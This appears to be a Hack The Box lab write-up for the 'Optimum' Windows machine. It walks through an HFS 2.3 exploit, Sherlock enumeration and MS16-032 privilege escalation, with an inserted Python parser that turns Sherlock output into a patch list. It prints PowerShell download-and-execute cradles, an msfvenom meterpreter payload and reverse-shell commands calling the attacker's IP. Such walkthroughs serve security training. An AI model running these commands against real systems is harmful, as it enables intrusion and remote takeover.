
Information

nmap

Start with a full-port scan.

┌──(kali㉿kali)-[~]
└─$ nmap -p- --min-rate 10000 10.10.10.8
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-22 07:09 EDT
Nmap scan report for 10.10.10.8
Host is up (0.28s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 47.19 seconds

Based on the open port, run a detailed service scan.

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p 80 10.10.10.8
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-22 07:12 EDT
Nmap scan report for 10.10.10.8
Host is up (0.28s latency).

PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.32 seconds

web

Browsing to port 80 shows the following page (screenshot not included in this extract).

This identifies the service as HFS (HttpFileServer).

WEB-GetShell

An exploit for HFS is available on exploit-db; save the exploit locally and edit its IP and port settings.

Then run the script with python3.

This directly yields a PowerShell shell.

Privilege

Find vulnerabilities

Because the system is an older Windows version, Sherlock is used to find exploitable vulnerabilities.

After cloning Sherlock locally, use grep to list all of the functions it defines.

┌──(kali㉿kali)-[~/Documents/htb/Optimum/Sherlock]
└─$ grep -i function Sherlock.ps1
function Get-FileVersionInfo ($FilePath) {
function Get-InstalledSoftware($SoftwareName) {
function Get-Architecture {
function Get-CPUCoreCount {
function New-ExploitTable {
function Set-ExploitTable ($MSBulletin, $VulnStatus) {
function Get-Results {
function Find-AllVulns {
function Find-MS10015 {
function Find-MS10092 {
function Find-MS13053 {
function Find-MS13081 {
function Find-MS14058 {
function Find-MS15051 {
function Find-MS15078 {
function Find-MS16016 {
function Find-MS16032 {
function Find-MS16034 {
function Find-CVE20177199 {
function Find-MS16135 {

Append a call to Find-AllVulns at the end of the ps1 script so that it runs when the script is loaded.

┌──(kali㉿kali)-[~/Documents/htb/Optimum/Sherlock]
└─$ tail -5 Sherlock.ps1

Set-ExploitTable $MSBulletin $VulnStatus

}
Find-AllVulns

Start an HTTP server locally to serve the file; in the target's shell, load and execute it with IEX.

IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.14/Sherlock.ps1')

Review Sherlock's results.

PS C:\Users\kostas\Desktop> IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.14/Sherlock.ps1')


Title : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID : 2010-0232
Link : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID : 2013-1300
Link : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID : 2013-3881
Link : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable

Title : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID : 2015-2426, 2015-2433
Link : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID : 2016-0093/94/95/96
Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable

Title : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID : 2016-7255
Link : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

Title : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID : 2017-7199
Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable

The bulletins flagged as vulnerable are MS16-032, MS16-034 and MS16-135. MS16-032 is chosen for the privilege escalation.
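The list of flagged bulletins above is exactly what a patch-management ticket needs. As an added example (not part of the original writeup or of the Sherlock project), the parser below reads Sherlock's "Key : Value" output, groups records by VulnStatus and expands the two CVEID shorthands visible in the output (comma-separated IDs, and the slash run "2016-0093/94/95/96") into full CVE identifiers. The sample input is a constructed excerpt in the same format as the output shown on this page.

```python
"""Turn Sherlock's text output into a patch-triage list.

Added example, not code from the original writeup or from Sherlock itself.
It relies only on the "Key : Value" layout and the VulnStatus strings that
Sherlock prints; the sample below is a constructed excerpt in that format.
"""
import re
from typing import Dict, List

# Constructed sample in Sherlock's output format (abridged from the page's layout).
SAMPLE_OUTPUT = """
Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title : Secondary Logon Handle
MSBulletin : MS16-032
CVEID : 2016-0099
Link : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID : 2016-0093/94/95/96
Link : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?
VulnStatus : Appears Vulnerable

Title : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID : 2016-0051
Link : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title : Nessus Agent 6.6.2 - 6.10.3
MSBulletin : N/A
CVEID : 2017-7199
Link : https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html
VulnStatus : Not Vulnerable
"""

FIELD_RE = re.compile(r"^(Title|MSBulletin|CVEID|Link|VulnStatus)\s*:\s*(.*)$")


def parse_sherlock(text: str) -> List[Dict[str, str]]:
    """Split the output into records; a blank line or a new Title starts a record."""
    records: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line.strip())
        if not m:
            if current:  # a non-field line (blank) closes the current record
                records.append(current)
                current = {}
            continue
        key, value = m.group(1), m.group(2).strip()
        if key == "Title" and current:  # a Title with no blank line before it
            records.append(current)
            current = {}
        current[key] = value
    if current:
        records.append(current)
    return records


def expand_cves(cveid: str) -> List[str]:
    """Expand Sherlock's CVEID shorthand into full CVE identifiers.

    "2015-1701, 2015-2433" -> two IDs; "2016-0093/94/95/96" -> four IDs, where
    each suffix replaces the trailing digits of the first number.
    """
    cves: List[str] = []
    for part in cveid.split(","):
        part = part.strip()
        if "/" not in part:
            cves.append(f"CVE-{part}")
            continue
        first, *suffixes = part.split("/")
        year, number = first.split("-")
        cves.append(f"CVE-{year}-{number}")
        for s in suffixes:
            cves.append(f"CVE-{year}-{number[: len(number) - len(s)]}{s}")
    return cves


def triage(text: str) -> Dict[str, List[str]]:
    """Group bulletin IDs by VulnStatus (e.g. 'Appears Vulnerable' -> patch list)."""
    groups: Dict[str, List[str]] = {}
    for rec in parse_sherlock(text):
        status = rec.get("VulnStatus", "Unknown")
        groups.setdefault(status, []).append(rec.get("MSBulletin", "N/A"))
    return groups


def missing_patches(text: str) -> List[Dict[str, object]]:
    """Records flagged 'Appears Vulnerable', with CVEs expanded, for the patch ticket."""
    return [
        {"bulletin": rec["MSBulletin"], "title": rec["Title"], "cves": expand_cves(rec["CVEID"])}
        for rec in parse_sherlock(text)
        if rec.get("VulnStatus") == "Appears Vulnerable"
    ]


if __name__ == "__main__":
    for item in missing_patches(SAMPLE_OUTPUT):
        print(item["bulletin"], "-", item["title"], "-", ", ".join(item["cves"]))
```

Run against the full output above, the "Appears Vulnerable" group is the set of bulletins (and their CVEs) whose absence on the host explains the escalation path; the "Not supported on 64-bit systems" group is worth a separate look, since Sherlock's result there says nothing about whether the patch is present.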

Get system privilege

The script used is Invoke-MS16032.ps1 from the Empire project. Save it to the working directory and edit it, appending the following line at the end of the file:

Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.14:808/shell.exe')"

This calls Invoke-MS16032 to load and run shell.exe. shell.exe is the payload generated with msfvenom:

┌──(kali㉿kali)-[~/Documents/htb/Optimum]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=3333 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes

Listen on port 3333 with msfconsole.

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.14.14
lhost => 10.10.14.14
msf6 exploit(multi/handler) > set lport 3333
lport => 3333
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.14:3333

After loading and running Invoke-MS16032 in the target's shell, nothing arrived at the handler listening on port 3333 in msfconsole; the attempt failed.

After investigation, the likely cause is that the current shell is 32-bit, so the check against the 64-bit system kernel fails.

To work around this, obtain an msf shell and migrate into a 64-bit process.

Once a meterpreter shell is obtained, list the processes with ps and migrate to a 64-bit process.

meterpreter > migrate 2140
[*] Migrating from 2716 to 2140...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 3
Meterpreter : x64/windows

After migrating, attempt the privilege escalation again.

Modify Invoke-PowerShellTcp.ps1 for the reverse shell by appending this as the last line:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 4444

Modify Invoke-MS16032.ps1, appending the following at the end so that it loads Invoke-PowerShellTcp.ps1 to spawn the reverse shell:

Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.14:808/Invoke-PowerShellTcp.ps1')"

With the files modified, start a listener locally on port 4444.

Run the following in the meterpreter shell:

powershell iex(New-Object Net.WebClient).DownloadString('http://10.10.14.14:808/Invoke-MS16032.ps1')

After the target runs the PowerShell command, the local HTTP server receives requests for /Invoke-MS16032.ps1 and then /Invoke-PowerShellTcp.ps1, and finally the listener on port 4444 catches a SYSTEM shell.

References:

https://0xdf.gitlab.io/2021/03/17/htb-optimum.html

https://www.youtube.com/watch?v=kWTnVBIpNsE
